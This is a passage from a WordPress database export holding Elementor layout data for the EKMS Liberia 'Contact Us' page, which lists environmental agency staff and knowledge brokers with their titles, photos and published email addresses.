href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24684,3653,'_elementor_edit_mode','builder'),(24685,3653,'_elementor_template_type','wp-page'),(24686,3653,'_elementor_version','3.0.16'),(24687,3653,'_wp_page_template','default'),(24688,3653,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 